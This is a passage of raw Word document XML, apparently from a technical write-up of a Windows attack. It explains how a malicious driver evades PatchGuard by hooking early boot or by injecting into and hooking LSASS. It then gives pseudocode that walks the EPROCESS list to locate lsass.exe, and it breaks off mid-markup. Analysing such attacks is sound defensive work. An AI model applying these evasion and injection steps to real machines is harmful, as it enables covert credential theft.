          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve"> not yet active </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705561F1" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By hooking </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>KiSystemStartup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and injecting code early, modifications can be made before </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> begins its monitoring loops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169B4A32" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Strategy 2: Process-Specific Modifications (Limited Scope) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Rather than modifying kernel-wide structures (which </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aggressively monitors), the attack modifies memory within a specific user-mode process (LSASS). This is significantly less monitored by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7A2C84" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:t>Process memory changes thousands of times per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100AA151" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:t>Process memory is not cryptographically sealed (kernel memory is)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DB6058" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> focuses on the kernel image, not individual processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350BC11F" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="283"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">This is the critical design insight: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cannot monitor all memory changes without imposing prohibitive performance overhead. By targeting user-mode process memory instead of kernel structures, the attack avoids </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scope of protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFCA21A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.3 Alternative: Silent Execution Without Modifications </w:t>
      </w:r>
      <w:r>
        <w:t>The most sophisticated variant avoids modifying kernel structures entirely. Instead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE36FC6" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:t>The malicious driver injects itself directly into LSASS memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C43DED7" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:t>It hooks LSASS functions from within the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C8A4C3" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:t>It never touches critical kernel structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1665B1B2" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has no reason to trigger because nothing in its monitored scope changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565EC005" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="69"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>This approach requires more complexity (intra-process manipulation) but provides superior stealth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF96F2A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="370" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1745" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D66E241" wp14:editId="0F028F70">
                <wp:extent cx="2182571" cy="6326"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="15034" name="Group 1503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506" name="Shape 50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34" style="width:171.856pt;height:0.4981pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="21825,63">
                <v:shape id="Shape 506" style="position:absolute;width:21825;height:0;left:0;top:0;" coordsize="2182571,0" path="m0,0l2182571,0">
                  <v:stroke weight="0.4981pt" endcap="flat" joinstyle="miter" miterlimit="10" on="true" color="#000000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A4E95" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="22" w:right="673"/>
      </w:pPr>
      <w:r>
        <w:t>Memory Exploitation: The Technical Heart of the Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2115B067" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3.1 Process Location via EPROCESS Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581D2613" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The kernel maintains all process information in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">EPROCESS </w:t>
      </w:r>
      <w:r>
        <w:t>structures linked in a doubly-linked circular list. To find LSASS, the driver walks this list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714A8BC1" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Locate the Initial System Process </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The kernel exports a symbol </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PsInitialSystemProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>that points to the first process (System, PID 4):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E057AF" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="119" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="3347" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">// Pseudocode: Kernel driver finding System process </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t xml:space="preserve">extern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PEPROCESS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PsInitialSystemProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PEPROCESS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>SystemProc</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PsInitialSystemProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6090B60E" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Traverse the Process List </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>From</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the System process, walk the circular linked list via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ActiveProcessLinks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA51CFD" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PEPROCESS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CurrentProc</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SystemProc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B55F0F3" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="37" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t xml:space="preserve">do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B09685A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Extract the process name from the EPROCESS structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F528E0" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="239" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve">// Offset varies by Windows version (typically around offset 0x450) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PCHAR </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ImageName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>= (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>)((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PUCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CurrentProc</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ProcessNameOffset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522DED98" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Compare against target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4700C05A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>strcmp</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ImageName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4070A1"/>
        </w:rPr>
        <w:t>"lsass.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">) == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E01843" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Found LSASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0F7477" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>TargetProcess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CurrentProc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF3E6ED" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="858" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EEFFF1" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="234" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDDA57B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Move to next process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71222CDB" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CurrentProc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>= (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PEPROCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>)((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PUCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CurrentProc</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ListOffset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471FD135" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
